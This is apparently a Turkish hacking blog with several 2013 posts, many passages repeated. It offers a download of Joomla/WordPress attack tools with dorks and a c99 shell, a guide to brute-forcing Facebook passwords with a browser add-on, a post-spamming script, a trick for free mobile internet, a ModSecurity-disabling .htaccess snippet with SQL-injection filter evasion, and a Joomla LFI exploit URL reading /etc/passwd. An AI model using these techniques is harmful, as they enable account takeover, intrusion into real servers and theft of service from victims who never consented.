29 Temmuz 2013 Pazartesi
Eksen Atak 1.5 ve 1.2 + Kullanımları
Tamamen kendi uploadım ve kendi oluşturduğum RAR'dır.İçinde Joomla Atak ve WordPress Atak kullanımı , Eksen Atak 1.5 ve 1.2 genel kullanımı , Eksen Atak 1.5 ve 1.2 , dorklar , kullanım için önerilerim , c99 indirme linki , arama motoru , wordpress ve joomla şifre listesi bulunmaktadır.Anlayacağınız her şeye yer verilmiştir.Eğer bir yorum atmaz veya teşekkür atmaz ama yararlanırsanız haram olsun
Not:Virüs bulunmasının nedeni içinde 3 tane hack tool olmasıdır.Eksen atak 1.5 ve 1.2 ,arama motoru.Sisteminize zarar vermez.Zaten kanıtlamama gerek yok Dr.Web Tool.EksenAtak bulmuş
Dosya.Tc'den İndir
http://adf.ly/T4lDT
Roosle'den İndir
http://adf.ly/T4lJx
28 Temmuz 2013 Pazar
Port Açmadan BackConnect Olma BT5.V.R3
Etiketler:
Backtrack,
Port Açmadan BackConnect Olma BT5.V.R3
27 Temmuz 2013 Cumartesi
Mozilla Facebok Hack
SA arkadaşlar arkadaşlar bu yayınımda Mozilla tarayıcısının Fireforce eklentisi ile facebook hacklemeyi gösterecegim..
ilk olarak burdan Fireforce eklentimizi mozilla tarayıcımıza kuruyoruz burdan :D
daha sonra m.facebook.com a giriyoruz hotmail kısmını dolduruyoruz şifre kısmına 123456789 girerek giriş yap diyoruz
daha sonra şifre kısmına sag tıklayarak fireforce a tıklayıp load dictionary deyip wordlistimizi seçiyoruz veya generate password kısmından oluşturuyoruz..
şifre bulundugunda Password Found kısmının karşısında şifre yazacaktır..
ilk olarak burdan Fireforce eklentimizi mozilla tarayıcımıza kuruyoruz burdan :D
daha sonra şifre kısmına sag tıklayarak fireforce a tıklayıp load dictionary deyip wordlistimizi seçiyoruz veya generate password kısmından oluşturuyoruz..
daha sonra çıkan yere https://m.facebook.com/login.php yazıp save dioruz ve bklioruz
şifre bulundugunda Password Found kısmının karşısında şifre yazacaktır..
XProje Durum Begendirme + Wall Post + Yorum Post Scripti
Meraba Arkadaşlar bu yayında XProje scriptini ve kullanımını anlatacagım..
ilk olarak Burdan scriptı indirin. şifr: heroturk
Daha sonra phpmyadmin e girerek yeni bir database oluşturun..
Sonra oluşturdugunuz db ye girerek içe aktar kısmından vermiş oldugum scriptin içerisinde bulunan sql dosyasını yükleyin..
Sql dosyasını yükledikten sonra scriptın içerisinde bulunan config.php dosyasını açın
# Database ayarları
define("vt_host", "localhost");
define("vt_user", "k.adı");
define("vt_pass", "şifre");
define("vt_database", "dbadı");
kısmını kendinize göre düzenleyin
düzenledikten sonra dosyaları sitenize yükleyin ve site:/install.php yazarak kurulum sayfasına gelin
lisans kısmına scriptin içinde vermiş oldugum lisans kodunu yazın
veri tabanı bilgilerini doldurun
uygulama bilgileri kısmına facebook uygulamanızın bilgilerini girin ve kurun.
uygulamanın Wall ve Yorum post kısımlarından uygulamayı kullanan kişilerin duvarlarında birşey paylaşabilir ve paylaşılan durumlara yorum yaptırabilirsiniz..
Free Net Vodafone & Turkcell
Program linki: operamini
.
ilk olarak java telefonunuza vermiş oldugum programı indirin ve açın.
Programdaki NETWORK SETTİNG e tıklayın ve daha sonra SETTİNGS kısmından hattınızı seçin ve save diyerek baglanmasını bekleyin..
(Turkcellliler:turkcell gprs vodafonelular vodafone live ile baglansın)
(Turkcellliler:turkcell gprs vodafonelular vodafone live ile baglansın)
Karşınıza böyle biryer çıkacak Kabul Et e tıklayın ve istediginiz siteye bedava girin
Not: Telefonunuzda TL olmaması gerekir..
ModSecurity ByPass
Apache Web Sunucusu İçin Bir Güvenlik Modülü Olan Mod Security***8217;yi Pasif Etmek İçin .htaccess Dosyası Arkadaşlar
Tahribat'ta da Bulunmalı Yazayım Dedim
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
ModSecurity Public Olduğu İçim Tüm Kullanıcılar Normalde Üst Dizinlere Erişemeyecekti, Ama Siz Linux'un Konteyner Dosyası Olan .htaccess ten Modülü Kullanmak İstemiyorum Şeklinde :P off Ederseniz Modülü ModSecurity Sizin İçin Pasif Hale Gelir ve Siz Üst Dizinlere Çıkabilirsiniz.
Ayrıca Buda İpucu olarak Bulunsun ModSecurity'li Sunucuda SQL Injection'da Forbidden Hatası Verir GET İle Gelen Veriyi Süzer ve Anahtar Kelimeleri Ayıklar Çünkü
Bunun İçinde Mesela SELECT Yerine SE/**/LECT Yaparsak, Modül Bunu Anlayamaz Injection Yok Zanneder
MySQL'dede /**/ Otomatik Olarak Yorum Olduğu İçin Null Değere Replace Eder, SE/**/CT Yine Sorguya SELECT Olarak Girer.
Tahribat'ta da Bulunmalı Yazayım Dedim
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
ModSecurity Public Olduğu İçim Tüm Kullanıcılar Normalde Üst Dizinlere Erişemeyecekti, Ama Siz Linux'un Konteyner Dosyası Olan .htaccess ten Modülü Kullanmak İstemiyorum Şeklinde :P off Ederseniz Modülü ModSecurity Sizin İçin Pasif Hale Gelir ve Siz Üst Dizinlere Çıkabilirsiniz.
Ayrıca Buda İpucu olarak Bulunsun ModSecurity'li Sunucuda SQL Injection'da Forbidden Hatası Verir GET İle Gelen Veriyi Süzer ve Anahtar Kelimeleri Ayıklar Çünkü
Bunun İçinde Mesela SELECT Yerine SE/**/LECT Yaparsak, Modül Bunu Anlayamaz Injection Yok Zanneder
MySQL'dede /**/ Otomatik Olarak Yorum Olduğu İçin Null Değere Replace Eder, SE/**/CT Yine Sorguya SELECT Olarak Girer.
Joomla LFİ açığı "Yeni" Heryerde dolu
Dork : inurl:components/com_acooldebate/acooldebate.php
Tam olarak yapılacak iş : Sitenin açığına exploit sokup ya da Password okuyum işleri halletmek
http://site/joomla yolu/index.php?option=com_acooldebate&controller={LFI}
Ben size bikaç ornek veriyim :.
Ftp okumak istiyorsanız :
http://site/joomla yolu/index.php?option=com_acooldebate&controller=../../../../../../../../../../etc/passwd
Tam olarak yapılacak iş : Sitenin açığına exploit sokup ya da Password okuyum işleri halletmek
http://site/joomla yolu/index.php?option=com_acooldebate&controller={LFI}
Ben size bikaç ornek veriyim :.
Ftp okumak istiyorsanız :
http://site/joomla yolu/index.php?option=com_acooldebate&controller=../../../../../../../../../../etc/passwd
Kaydol:
Kayıtlar (Atom)




